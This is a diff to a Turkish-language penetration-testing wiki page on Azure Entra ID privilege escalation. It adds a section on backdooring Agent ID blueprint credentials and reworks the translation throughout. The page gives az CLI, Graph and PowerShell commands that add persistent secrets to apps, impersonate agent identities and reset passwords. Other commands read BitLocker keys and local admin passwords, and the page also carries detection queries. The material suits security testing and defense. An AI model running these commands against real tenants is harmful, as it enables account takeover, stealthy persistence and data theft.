diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
index 9fa7d4b24..132ee3fb4 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -3,13 +3,13 @@
{{#include ../../../../banners/hacktricks-training.md}}
> [!NOTE]
-> Not that **all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.**
+> Entra ID içinde built-in roles tarafından sağlanan **tüm ayrıntılı permissions** custom roles içinde **kullanılmak üzere uygun değildir.**
## Roles
### Role: Privileged Role Administrator
-Bu role, principal'lere role atayabilmek ve role daha fazla permissions vermek için gerekli granular permissions içerir. Her iki action da privileges escalate etmek için abuse edilebilir.
+Bu role, principal’lere roles atayabilmek ve roles’a daha fazla permissions verebilmek için gerekli ayrıntılı permissions dahildir. Her iki action da privileges yükseltmek için abused edilebilir.
- Assign role to a user:
```bash
@@ -52,7 +52,7 @@ az rest --method PATCH \
### `microsoft.directory/applications/credentials/update`
-Bu, bir saldırganın mevcut uygulamalara **kimlik bilgileri eklemesine** (parolalar veya sertifikalar) izin verir. Uygulama ayrıcalıklı izinlere sahipse, saldırgan bu uygulama olarak kimlik doğrulayabilir ve bu ayrıcalıkları elde edebilir.
+Bu, bir saldırganın mevcut uygulamalara **kimlik bilgileri eklemesine** (parolalar veya sertifikalar) izin verir. Uygulamanın ayrıcalıklı izinleri varsa, saldırgan o uygulama olarak kimlik doğrulaması yapabilir ve bu ayrıcalıkları elde edebilir.
```bash
# Generate a new password without overwritting old ones
az ad app credential reset --id --append
@@ -67,7 +67,7 @@ az ad app credential reset --id --append
```
### `microsoft.directory/applications/owners/update`
-Kendilerini bir owner olarak ekleyerek, bir attacker application'ı manipüle edebilir, credentials ve permissions dahil.
+Kendilerini bir owner olarak ekleyerek, bir attacker application’ı manipulate edebilir, credentials ve permissions dahil.
```bash
az ad app owner add --id --owner-object-id
az ad app credential reset --id --append
@@ -77,9 +77,9 @@ az ad app owner list --id
```
### `microsoft.directory/applications/allProperties/update`
-Bir attacker, tenant kullanıcıları tarafından kullanılan applications'a bir redirect URI ekleyebilir ve ardından onlarla yeni redirect URL'yi kullanan login URLs paylaşarak token'larını steal edebilir. Kullanıcı zaten application içinde logged in ise, authentication otomatik olacak ve kullanıcının herhangi bir şeyi accept etmesi gerekmeyecektir.
+Bir attacker, tenant kullanıcıları tarafından kullanılan applications uygulamalarına bir redirect URI ekleyebilir ve ardından onlarla yeni redirect URL'yi kullanan login URLs paylaşarak token'larını steal edebilir. Eğer user zaten application'da logged in ise, authentication otomatik olacak ve user'ın hiçbir şeyi kabul etmesi gerekmeyecek.
-Ayrıca application'ın request ettiği permissions'ları değiştirerek daha fazla permissions almak da mümkündür, ancak bu durumda user, tüm permissions'ları isteyen prompt'u yeniden accept etmek zorunda kalacaktır.
+Ayrıca, application'ın istediği permissions değiştirilerek daha fazla permissions elde etmek de mümkündür, ancak bu durumda user'ın tüm permissions için onay isteyen prompt'u yeniden kabul etmesi gerekecektir.
```bash
# Get current redirect uris
az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris"
@@ -88,13 +88,13 @@ az ad app update --id --web-redirect-uris "https://original.com/callbac
```
### Applications Privilege Escalation
-**[Bu yazıda](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/) açıklandığı gibi** varsayılan uygulamalarda **`Application`** türünde **API permissions** bulunması çok yaygındı. Entra ID konsolunda **`Application`** türündeki bir API Permission, uygulamanın API’ye erişebileceği ve kullanıcı bağlamı olmadan (uygulamaya kullanıcı girişi olmadan) ve bunu izin vermek için Entra ID rollerine ihtiyaç duymadan işlemler gerçekleştirebileceği anlamına gelir. Bu nedenle, **her Entra ID tenant içinde yüksek yetkili uygulamalar** bulmak çok yaygındır.
+**[Bu yazıda](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/) açıklandığı gibi** **`Application`** türünde **API permissions** atanmış default applications bulmak çok yaygındı. **`Application`** türündeki bir API Permission (Entra ID console’da adlandırıldığı gibi), application’ın API’ye erişebileceği ve user context olmadan (app içine user login olmadan) işlem yapabileceği, ayrıca bunun için Entra ID roles gerektirmediği anlamına gelir. Bu nedenle, **her Entra ID tenant içinde yüksek yetkili applications** bulmak çok yaygındır.
-Sonra, bir saldırganın uygulamanın kimlik bilgilerini (**secret** veya **certificate**) **güncellemesine** izin veren herhangi bir permission/role’u varsa, saldırgan yeni bir kimlik bilgisi oluşturabilir ve ardından bunu **uygulama olarak authenticate olmak** için kullanabilir; böylece uygulamanın sahip olduğu tüm izinleri elde eder.
+Sonra, bir attacker application’ın **credentials (secret o certificate)** güncellemesine izin veren herhangi bir permission/role’a sahipse, attacker yeni bir credential oluşturabilir ve bunu kullanarak **application olarak authenticate olabilir**, böylece application’ın sahip olduğu tüm permissions’ları elde eder.
-Belirtmek gerekir ki, anılan blog common Microsoft default applications için bazı **API permissions** paylaşıyordu; ancak bu rapordan bir süre sonra Microsoft bu sorunu düzeltti ve artık Microsoft applications olarak login olmak mümkün değil. Yine de, kötüye kullanılabilecek **yüksek yetkilere sahip custom applications** bulmak hâlâ mümkün.
+Bahsedilen blogun bazı yaygın Microsoft default applications için **API permissions** paylaştığına dikkat edin; ancak bu rapordan bir süre sonra Microsoft bu sorunu düzeltti ve artık Microsoft applications olarak login olmak mümkün değil. Yine de, hala **istismar edilebilecek yüksek privileges’e sahip custom applications** bulmak mümkün.
-Bir application’ın API permissions’ını nasıl enumerate edilir:
+Bir application’ın API permissions’larını enumerate etme yöntemi:
```bash
# Get "API Permissions" of an App
## Get the ResourceAppId
@@ -125,7 +125,7 @@ az ad sp show --id --query "appRoles[?id==''].value" -o tsv
az ad sp show --id 00000003-0000-0000-c000-000000000000 --query "appRoles[?id=='d07a8cc0-3d51-4b77-b3b0-32704d1f69fa'].value" -o tsv
```
-Tüm application API permissions'ları bulun ve Microsoft-owned API'leri işaretleyin
+Tüm applications API permissions öğelerini bulun ve Microsoft-owned API'leri işaretleyin
```bash
#!/usr/bin/env bash
set -euo pipefail
@@ -241,27 +241,102 @@ done < <(jq -c '.[]' <<<"$apps_json")
### `microsoft.directory/servicePrincipals/credentials/update`
-Bu, bir saldırganın mevcut service principal’lara credentials eklemesine izin verir. Service principal ayrıcalıklı yetkilere sahipse, saldırgan bu yetkileri üstlenebilir.
+Bu, bir saldırganın mevcut service principals öğelerine credentials eklemesine izin verir. Service principal elevated privileges sahibiyse, saldırgan bu privileges öğelerini üstlenebilir.
```bash
az ad sp credential reset --id --append
```
> [!CAUTION]
-> Yeni oluşturulan password web console'da görünmeyecek, bu yüzden bu, bir service principal üzerinde persistence sürdürmek için stealth bir yol olabilir.\
+> Yeni oluşturulan password web console içinde görünmeyecek, bu yüzden bir service principal üzerinde persistence sağlamak için stealth bir yol olabilir.\
> API'den şu şekilde bulunabilirler: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json`
-Eğer `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` hatasını alırsanız bunun nedeni **SP'nin passwordCredentials property'sini modify etmenin mümkün olmaması** ve önce bunun unlock edilmesi gerekmesidir. Bunun için, şunu execute etmenize izin veren bir permission (`microsoft.directory/applications/allProperties/update`) gerekir:
+Eğer `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` hatasını alırsanız, bunun nedeni SP'nin **passwordCredentials** property'sini değiştirmek mümkün olmamasıdır ve önce bunu unlock etmeniz gerekir. Bunun için şu komutu çalıştırmanıza izin veren bir permission (`microsoft.directory/applications/allProperties/update`) gerekir:
```bash
az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}'
```
+### Entra Agent ID blueprint credential abuse (`AgentIdentityBlueprint.AddRemoveCreds.All`)
+
+**Agent identity blueprints** application objects are ve her blueprint ayrıca tenant içinde bir **agent identity blueprint principal** oluşturur. **Agent identities**, bu blueprint yolunun service-principal-türevli çocuklarıdır. Bu nedenle, bir saldırgan **blueprint'e bir password/certificate ekleyebilirse** veya zaten onun credential'larından birini çalmışsa, daha sonra **blueprint principal** olarak authenticate olabilir ve child agent identities için token request edebilir.
+
+Bu, kötü bir Entra Agent ID role assignment'i şuna dönüştürür:
+
+- **Persistence**: yeni `passwordCredential` kaldırılana kadar blueprint üzerinde kalır
+- **Privilege escalation**: düşük-trust/dev bir agent farklı, yüksek-trust bir blueprint'e geçebilir ve sonra onun child agent'leri gibi davranabilir
+
+Tipik tehlikeli yollar şunlardır:
+
+- **`AgentIdentityBlueprint.AddRemoveCreds.All`** sahip bir compromised agent identity
+- Blueprint'i yönetebilen compromised owner/sponsor/admin
+- Mevcut bir blueprint secret/certificate'ın theft'i
+
+Target blueprint'e yeni bir secret ekleyin:
+```bash
+az rest --method POST \
+--url "https://graph.microsoft.com/beta/applications//addPassword" \
+--headers 'Content-Type=application/json' \
+--body '{"passwordCredential":{"displayName":"ht-backdoor"}}'
+```
+Veya Microsoft Graph PowerShell ile:
+```powershell
+$params = @{ passwordCredential = @{ displayName = 'ht-backdoor' } }
+Add-MgBetaApplicationPassword -ApplicationId -BodyParameter $params
+```
+Yeni kimlik bilgisi kabul edilirse, **blueprint principal** olarak authenticate olun ve Agent ID token exchange'i abuse edin. İlk request, blueprint credential'ı kullanır ve **`fmi_path`** değerini hedef agent identity'ye ayarlar. Dönen token daha sonra, o agent identity için bir Microsoft Graph token almak üzere **JWT bearer `client_assertion`** olarak yeniden kullanılır.
+```bash
+curl -X POST "https://login.microsoftonline.com//oauth2/v2.0/token" \
+-H 'Content-Type: application/x-www-form-urlencoded' \
+--data-urlencode 'client_id=' \
+--data-urlencode 'client_secret=' \
+--data-urlencode 'fmi_path=' \
+--data-urlencode 'grant_type=client_credentials' \
+--data-urlencode 'scope=api://AzureADTokenExchange/.default'
+```
+
+```bash
+curl -X POST "https://login.microsoftonline.com//oauth2/v2.0/token" \
+-H 'Content-Type: application/x-www-form-urlencoded' \
+--data-urlencode 'client_id=' \
+--data-urlencode 'client_assertion_type=urn:ietf:params:oauth:client-assertion-type:jwt-bearer' \
+--data-urlencode 'client_assertion=' \
+--data-urlencode 'grant_type=client_credentials' \
+--data-urlencode 'scope=https://graph.microsoft.com/.default'
+```
+> [!CAUTION]
+> Eğer bir **dev** blueprint veya onun child agent’ı bir **prod** blueprint’e credentials ekleyebiliyorsa, saldırgan beklenen blueprint/agent trust boundary’yi aşar ve target agent infrastructure üzerinde kalıcı access elde eder.
+
+Quick validation / scoping:
+```powershell
+$sp = Get-MgBetaServicePrincipal -ServicePrincipalId
+$sp.AdditionalProperties['@odata.type']
+$sp.AdditionalProperties['agentIdentityBlueprintId']
+
+$app = Get-MgBetaApplication -ApplicationId
+$app.AdditionalProperties['@odata.type']
+$app.PasswordCredentials | ? { $_.KeyId -eq '' }
+```
+Hunting notes:
+
+- [Az - Monitoring](../../az-services/az-monitoring.md) içinde **`Update application – Certificates and secrets management`** ifadesini ara
+- **`AuditLogs`**, **`MicrosoftGraphActivityLogs`** ve **`AADServicePrincipalSignInLogs`** verilerini zaman, service principal ID, user-agent, IP ve `SignInActivityId` / `UniqueTokenIdentifier` ile ilişkilendir
+- `MicrosoftGraphActivityLogs` içinde, **`/applications//microsoft.graph.addPassword`** ile biten `RequestUri` ve `Roles` alanının **`AgentIdentityBlueprint.AddRemoveCreds.All`** içerip içermediğini kontrol et
+- `AADServicePrincipalSignInLogs` içinde `ServicePrincipalCredentialKeyId`, `ClientCredentialType`, `Agent.agentType` alanlarını ve yeni key'in daha sonra kullanılıp kullanılmadığını incele
+
+Yeni eklenen secret'ın authentication için kullanılıp kullanılmadığını görmek için minimal KQL:
+```kusto
+AADServicePrincipalSignInLogs
+| where ServicePrincipalCredentialKeyId == ""
+| project CreatedDateTime, ServicePrincipalName, ServicePrincipalId, IPAddress, UserAgent, ResourceDisplayName
+```
+Bu, generic [application credential abuse](../../az-services/az-azuread.md#applications) ve [service principal credential persistence](../../az-persistence/README.md#applications-and-service-principals) ile ilişkilidir, ancak Entra Agent ID, blueprint credential’ın **farklı bir agent identity token** ile değiştirilebildiği ikinci bir aşama ekler.
+
### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage`
-Bu, bir attacker’ın mevcut service principals üzerine credentials eklemesine izin verir. Service principal elevated privileges’e sahipse, attacker bu privileges’i üstlenebilir.
+Bu, bir saldırganın mevcut service principal’lara credential eklemesine izin verir. Eğer service principal yükseltilmiş yetkilere sahipse, saldırgan bu yetkileri üstlenebilir.
```bash
az ad sp credential reset --id --append
```
### `microsoft.directory/servicePrincipals/owners/update`
-Uygulamalar gibi, bu izin bir service principal'a daha fazla owner eklemeye izin verir. Bir service principal'a sahip olmak, onun credentials ve permissions üzerinde kontrol sağlar.
+Uygulamalar gibi, bu permission bir service principal'a daha fazla owner eklemeye izin verir. Bir service principal'a sahip olmak, onun credentials ve permissions üzerinde kontrol sağlar.
```bash
# Add new owner
spId=""
@@ -279,13 +354,13 @@ az ad sp credential reset --id --append
az ad sp owner list --id
```
> [!CAUTION]
-> Yeni bir owner ekledikten sonra onu kaldırmayı denedim ama API, DELETE methodunun desteklenmediğini söyledi; oysa owner'ı silmek için kullanman gereken method bu. Yani artık **owner'ları kaldıramazsınız**.
+> Yeni bir owner ekledikten sonra, onu kaldırmayı denedim ama API, owner’ı silmek için kullanmanız gereken yöntem olmasına rağmen DELETE methodunun desteklenmediğini belirtti. Bu yüzden artık **owners kaldırılamıyor**.
### `microsoft.directory/servicePrincipals/disable` and `enable`
-Bu permissions, service principal'ları disable ve enable etmeye izin verir. Bir attacker, privilege escalation için bir şekilde erişim sağlayabildiği bir service principal'ı enable etmek amacıyla bu permission'ı kullanabilir.
+Bu permissions service principals’i disable ve enable etmeye izin verir. Bir attacker, bir şekilde erişim elde edebildiği bir service principal’i enable ederek privileges escalation yapmak için bu permission’ı kullanabilir.
-Bu technique için attacker'ın, enable edilen service principal'ı takeover etmek için ayrıca daha fazla permission'a ihtiyacı olacağını unutmayın.
+Bu technique için attacker’ın, enabled service principal’i ele geçirmek için daha fazla permission’a ihtiyacı olacağını unutmayın.
```bash
# Disable
az ad sp update --id --account-enabled false
@@ -295,7 +370,7 @@ az ad sp update --id --account-enabled true
```
#### `microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials` & `microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials`
-Bu izinler, tek oturum açma için credential oluşturulmasına ve alınmasına izin verir; bu da üçüncü taraf uygulamalara erişim sağlayabilir.
+Bu permissions, third-party applications'e erişim sağlayabilecek single sign-on için credentials oluşturmayı ve almayı sağlar.
```bash
# Generate SSO creds for a user or a group
spID=""
@@ -321,30 +396,30 @@ az rest --method POST \
### `microsoft.directory/groups/allProperties/update`
-Bu izin, kullanıcıların ayrıcalıklı gruplara eklenmesine izin verir ve bu da privilege escalation'a yol açar.
+Bu izin, kullanıcıları privileged gruplara eklemeye olanak tanır ve bu da privilege escalation'a yol açar.
```bash
az ad group member add --group --member-id
```
-**Not**: Bu izin, Entra ID role-assignable groups için geçerli değildir.
-
-### `microsoft.directory/groups/owners/update`
-
-Bu izin, groups sahibi olmayı sağlar. Bir group sahibı, group üyeliğini ve ayarlarını kontrol edebilir; bu da potansiyel olarak group üzerinden ayrıcalık yükseltmeye yol açabilir.
-```bash
-az ad group owner add --group --owner-object-id
-az ad group member add --group --member-id
-```
**Not**: Bu izin Entra ID role-assignable groups kapsamaz.
+### `microsoft.directory/groups/owners/update`
+
+Bu izin, grupların sahibi olmayı sağlar. Bir grubun sahibi, grup üyeliğini ve ayarlarını kontrol edebilir; bu da potansiyel olarak group üzerinde privilege escalation sağlayabilir.
+```bash
+az ad group owner add --group --owner-object-id
+az ad group member add --group --member-id
+```
+**Not**: Bu izin, Entra ID role-assignable groups kapsam dışıdır.
+
### `microsoft.directory/groups/members/update`
-Bu izin, bir gruba üyeler eklemeye izin verir. Bir saldırgan, kendisini veya kötü amaçlı hesapları privileged groups ekleyerek elevated access elde edebilir.
+Bu izin, bir gruba üyeler eklemeye izin verir. Bir attacker, kendisini veya malicious hesapları privileged gruplara ekleyerek elevated access elde edebilir.
```bash
az ad group member add --group --member-id
```
### `microsoft.directory/groups/dynamicMembershipRule/update`
-Bu permission, bir dynamic group içindeki membership rule'u update etmeye izin verir. Bir attacker, dynamic rules'u değiştirerek explicit addition olmadan kendisini privileged groups'a dahil edebilir.
+Bu izin, dinamik bir gruptaki membership rule'u güncellemeye izin verir. Bir attacker, dynamic rules'u değiştirerek explicit addition olmadan kendisini privileged groups içine dahil edebilir.
```bash
groupId=""
az rest --method PATCH \
@@ -355,11 +430,11 @@ az rest --method PATCH \
"membershipRuleProcessingState": "On"
}'
```
-**Not**: Bu izin, Entra ID role-assignable groups gruplarını hariç tutar.
+**Not**: Bu izin, Entra ID role-assignable gruplarını hariç tutar.
### Dynamic Groups Privesc
-Kullanıcıların kendi özelliklerini değiştirerek dynamic groups üyeleri olarak eklenmeleri ve böylece privileges yükseltmeleri mümkün olabilir. Daha fazla bilgi için şuna bakın:
+Kullanıcıların, kendi özelliklerini değiştirerek dynamic groups üyeleri olarak eklenmeleri ve böylece privilege escalation yapmaları mümkün olabilir. Daha fazla bilgi için şuna bakın:
{{#ref}}
dynamic-groups.md
@@ -369,7 +444,7 @@ dynamic-groups.md
### `microsoft.directory/users/password/update`
-Bu permission, non-admin users için password reset yapmaya izin verir ve potansiyel bir attacker'ın diğer users üzerinde privileges yükseltmesini mümkün kılar. Bu permission custom roles'a atanamaz.
+Bu permission, admin olmayan kullanıcıların password'unu sıfırlamaya izin verir ve bu da potansiyel bir attacker'ın diğer kullanıcılar üzerinden privilege escalation yapmasını sağlayabilir. Bu permission custom roles'a atanamaz.
```bash
# Update user password
userId=""
@@ -389,7 +464,7 @@ az rest --method PATCH \
```
### `microsoft.directory/users/basic/update`
-Bu ayrıcalık, kullanıcının özelliklerini değiştirmeye izin verir. Özellik değerlerine göre kullanıcı ekleyen dynamic groups bulmak yaygındır; bu nedenle, bu permission bir kullanıcının belirli bir dynamic group’a üye olmak için gerekli özellik değerini ayarlamasına ve privileges yükseltmesine izin verebilir.
+Bu yetki, kullanıcının özelliklerini değiştirmeye izin verir. Özellik değerlerine göre kullanıcı ekleyen dynamic groups bulmak yaygındır; bu nedenle, bu izin bir kullanıcının belirli bir dynamic group üyesi olmak için gereken özellik değerini ayarlamasına ve privileges escalate etmesine imkan verebilir.
```bash
#e.g. change manager of a user
victimUser=""
@@ -407,7 +482,7 @@ az rest --method PATCH \
```
## Conditional Access Policies & MFA bypass
-Yanlış yapılandırılmış ve MFA gerektiren conditional access policies bypass edilebilir, kontrol et:
+Hatalı yapılandırılmış ve MFA gerektiren conditional access policies bypass edilebilir, kontrol et:
{{#ref}}
az-conditional-access-policies-mfa-bypass.md
@@ -417,7 +492,7 @@ az-conditional-access-policies-mfa-bypass.md
### `microsoft.directory/devices/registeredOwners/update`
-Bu permission, saldırganların cihazların owner'ı olarak kendilerini atamasına izin verir; böylece device-specific ayarlar ve verilere kontrol veya access kazanabilirler.
+Bu permission, saldırganların cihazların owner'ları olarak kendilerini atamasına izin verir; böylece cihaz kontrolü veya cihaza özel ayarlar ve verilere erişim elde edebilirler.
```bash
deviceId=""
userId=""
@@ -428,7 +503,7 @@ az rest --method POST \
```
### `microsoft.directory/devices/registeredUsers/update`
-Bu izin, saldırganların hesaplarını cihazlarla ilişkilendirerek erişim kazanmasına veya security policies'i bypass etmesine olanak tanır.
+Bu izin, saldırganların hesaplarını cihazlarla ilişkilendirmesine, erişim kazanmasına veya güvenlik politikalarını aşmasına olanak tanır.
```bash
deviceId=""
userId=""
@@ -439,7 +514,7 @@ az rest --method POST \
```
### `microsoft.directory/deviceLocalCredentials/password/read`
-Bu izin, saldırganların Microsoft Entra joined cihazlar için yedeklenmiş local administrator account credentials özelliklerini, password dahil, okumasına izin verir
+Bu izin, saldırganların Microsoft Entra joined devices için yedeklenen local administrator account credentials özelliklerini, password dahil, okumasına olanak tanır
```bash
# List deviceLocalCredentials
az rest --method GET \
@@ -454,7 +529,7 @@ az rest --method GET \
### `microsoft.directory/bitlockerKeys/key/read`
-Bu izin, BitLocker anahtarlarına erişim sağlar ve bu da bir saldırganın sürücülerin şifresini çözmesine, böylece veri gizliliğini tehlikeye atmasına olanak verebilir.
+Bu izin, BitLocker anahtarlarına erişim sağlar; bu da bir saldırganın disklerin şifresini çözmesine izin verebilir ve veri gizliliğini tehlikeye atabilir.
```bash
# List recovery keys
az rest --method GET \
@@ -465,7 +540,7 @@ recoveryKeyId=""
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"
```
-## Diğer ilginç izinler (TODO)
+## Diğer İlginç permissions (TODO)
- `microsoft.directory/applications/permissions/update`
- `microsoft.directory/servicePrincipals/permissions/update`
@@ -475,4 +550,11 @@ az rest --method GET \
- `microsoft.directory/applications/appRoles/update`
- `microsoft.directory/applications.myOrganization/permissions/update`
+## References
+
+- [Red Canary - Microsoft Entra Agent ID içinde Şüpheli AI Workflows Araştırması: Autonomous Agents](https://redcanary.com/blog/threat-detection/entra-id-ai-workflows/)
+- [Microsoft Learn - Microsoft Entra Agent ID içinde Agent identity blueprints](https://learn.microsoft.com/en-us/entra/agent-id/agent-blueprint)
+- [Microsoft Learn - Autonomous agents için authenticate etme ve tokens edinme](https://learn.microsoft.com/en-us/entra/agent-id/autonomous-agent-authentication-authorization-flow)
+
+
{{#include ../../../../banners/hacktricks-training.md}}